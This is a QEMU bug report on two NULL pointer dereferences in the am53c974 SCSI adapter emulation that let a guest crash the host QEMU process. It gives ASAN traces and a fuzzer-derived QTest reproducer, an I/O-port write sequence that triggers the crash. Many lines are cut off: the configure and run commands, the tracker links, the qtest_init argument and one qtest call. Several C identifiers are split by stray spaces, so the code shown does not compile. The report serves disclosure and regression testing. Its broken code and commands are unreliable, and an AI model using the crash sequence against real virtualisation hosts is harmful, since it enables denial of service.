NULL pointer dereference issues in am53c974 SCSI host bus adapter
Bug Description
Two NULL pointer dereference issues were found in the am53c974 SCSI host bus adapter emulation of QEMU. They could occur while handling the 'Information Transfer' command (CMD_TI) in function handle_ti() in hw/scsi/esp.c, and could be abused by a malicious guest to crash the QEMU process on the host, resulting in a denial of service.
Both issues were reported by Cheolwoo Myung (Seoul National University). To reproduce them, configure and run QEMU as follows. Please find attached the required disk images.
$ ./configure --target-
$ make
$ ./qemu-
-device am53c974,id=scsi -device scsi-hd,
-drive id=SysDisk,
Additional info:
RHBZ: https:/
RHBZ: https:/
ASAN logs:
==672133==
hw/scsi/
AddressSanitize
=======
==672133==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000171 (pc 0x55bd63e20b85 bp 0x7f4b6fffdfa0 sp 0x7f4b6fffdf70 T7)
==672133==The signal is caused by a READ memory access.
==672133==Hint: address points to the zero page.
#0 0x55bd63e20b85 in scsi_req_continue hw/scsi/
#1 0x55bd63ab34fb in esp_do_dma hw/scsi/esp.c:453
#2 0x55bd63ab4b3c in handle_ti hw/scsi/esp.c:549
#3 0x55bd63ab72a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x55bd63d7b5dd in esp_pci_io_write hw/scsi/
#5 0x55bd645d55a3 in memory_
#6 0x55bd645d5a24 in access_
#7 0x55bd645e2baa in memory_
#8 0x55bd646b75ff in flatview_
#9 0x55bd646b79d1 in flatview_write softmmu/
#10 0x55bd646b8341 in address_space_write softmmu/
#11 0x55bd646b83f9 in address_space_rw softmmu/
#12 0x55bd648c4736 in kvm_handle_io accel/kvm/
#13 0x55bd648c69c8 in kvm_cpu_exec accel/kvm/
#14 0x55bd647b2413 in kvm_vcpu_thread_fn accel/kvm/
#15 0x55bd64f560de in qemu_thread_start util/qemu-
#16 0x7f4b981763f8 in start_thread (/lib64/
#17 0x7f4b980a3902 in __GI___clone (/lib64/
---
==672020==
hw/scsi/
AddressSanitize
=======
==672020==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000098 (pc 0x559bc99946fd bp 0x7f08bd737fb0 sp 0x7f08bd737f70 T7)
==672020==The signal is caused by a READ memory access.
==672020==Hint: address points to the zero page.
#0 0x559bc99946fd in do_busid_cmd hw/scsi/esp.c:196
#1 0x559bc9994e71 in do_cmd hw/scsi/esp.c:220
#2 0x559bc999ae81 in handle_ti hw/scsi/esp.c:555
#3 0x559bc999d2a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x559bc9c615dd in esp_pci_io_write hw/scsi/
#5 0x559bca4bb5a3 in memory_
#6 0x559bca4bba24 in access_
#7 0x559bca4c8baa in memory_
#8 0x559bca59d5ff in flatview_
#9 0x559bca59d9d1 in flatview_write softmmu/
#10 0x559bca59e341 in address_space_write softmmu/
#11 0x559bca59e3f9 in address_space_rw softmmu/
#12 0x559bca7aa736 in kvm_handle_io accel/kvm/
#13 0x559bca7ac9c8 in kvm_cpu_exec accel/kvm/
#14 0x559bca698413 in kvm_vcpu_thread_fn accel/kvm/
#15 0x559bcae3c0de in qemu_thread_start util/qemu-
#16 0x7f08e57ba3f8 in start_thread (/lib64/
#17 0x7f08e56e7902 in __GI___clone (/lib64/
QTest reproducer for the first issue:
/*
* Autogenerated Fuzzer Test Case
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
* See the COPYING file in the top-level directory.
*/
#include "qemu/osdep.h"
#include "libqos/libqtest.h"
/* if=none, file=null- co://,format= raw -nodefaults -qtest stdio
"scsi- hd,drive= disk0 -drive "
"id=disk0, if=none, file=null- co://,format= raw -nodefaults"); bufwrite( s, 0x0, "\x41", 0x1);
* cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest, -m \
* 512M -device am53c974,id=scsi -device scsi-hd,drive=disk0 -drive \
* id=disk0,
* outl 0xcf8 0x80001010
* outl 0xcfc 0xc000
* outl 0xcf8 0x80001004
* outw 0xcfc 0x05
* outb 0xc046 0x02
* outl 0xc00b 0xc100
* outl 0xc040 0x03
* outl 0xc040 0x03
* write 0x0 0x1 0x41
* outl 0xc00b 0xc100
* outw 0xc040 0x02
* outw 0xc040 0x81
* outl 0xc00b 0x9000
* EOF
*/
/*
 * Regression reproducer for the first NULL pointer dereference reported
 * above (the ASAN trace ending in esp_do_dma -> scsi_req_continue): it
 * replays, through the qtest API, the same outl/outw/outb/write sequence
 * listed in shell form in the header comment.  A fixed QEMU must survive
 * this sequence; an unfixed one crashes the host-side QEMU process.
 *
 * NOTE(review): two lines of this copy are truncated by the bug tracker's
 * paste.  The qtest_init() argument string is cut off after its first
 * fragment (the full command line is the one in the header comment), and
 * the call after the two 0xc040 writes -- `write 0x0 0x1 0x41` in the
 * shell transcript -- survives only as "qtest_".
 */
static void test_fuzz(void)
{
/* Boot an i386 machine with the am53c974 adapter and a null-backed scsi-hd. */
QTestState *s = qtest_init(
"-display none , -m 512M -device am53c974,id=scsi -device "
/* PCI config-space accesses through ports 0xcf8/0xcfc: presumably assigns
 * BAR0 of the adapter to I/O base 0xc000 and enables I/O space + bus
 * mastering in its command register -- verify against the device's
 * config layout. */
qtest_outl(s, 0xcf8, 0x80001010);
qtest_outl(s, 0xcfc, 0xc000);
qtest_outl(s, 0xcf8, 0x80001004);
qtest_outw(s, 0xcfc, 0x05);
/* Register writes into the adapter's I/O window at 0xc000.  Which of these
 * reaches handle_ti() is not visible from this listing; the ASAN trace only
 * shows that the crash is entered through esp_reg_write(). */
qtest_outb(s, 0xc046, 0x02);
qtest_outl(s, 0xc00b, 0xc100);
qtest_outl(s, 0xc040, 0x03);
qtest_outl(s, 0xc040, 0x03);
/* Truncated in this copy: the guest-memory write from the header transcript. */
qtest_
qtest_outl(s, 0xc00b, 0xc100);
qtest_outw(s, 0xc040, 0x02);
qtest_outw(s, 0xc040, 0x81);
qtest_outl(s, 0xc00b, 0x9000);
/* Tear down the guest; the test passes simply by reaching this point. */
qtest_quit(s);
}
/*
 * Test entry point: registers test_fuzz only when the qtest target
 * architecture is i386 (the reproducer hard-codes x86 PCI config ports and
 * I/O addresses), then hands control to the GLib test runner.
 *
 * NOTE(review): "g_test_ init", "qtest_ add_func(" and "fuzz/test_ fuzz"
 * carry stray spaces introduced by the tracker's paste; the test name is a
 * runtime string and is left untouched here.
 */
int main(int argc, char **argv)
{
const char *arch = qtest_get_arch();
g_test_ init(&argc, &argv, NULL);
/* Skip silently on other targets: the port sequence assumes the PC PCI layout. */
if (strcmp(arch, "i386") == 0) {
qtest_ add_func( "fuzz/test_ fuzz", test_fuzz);
}
return g_test_run();
}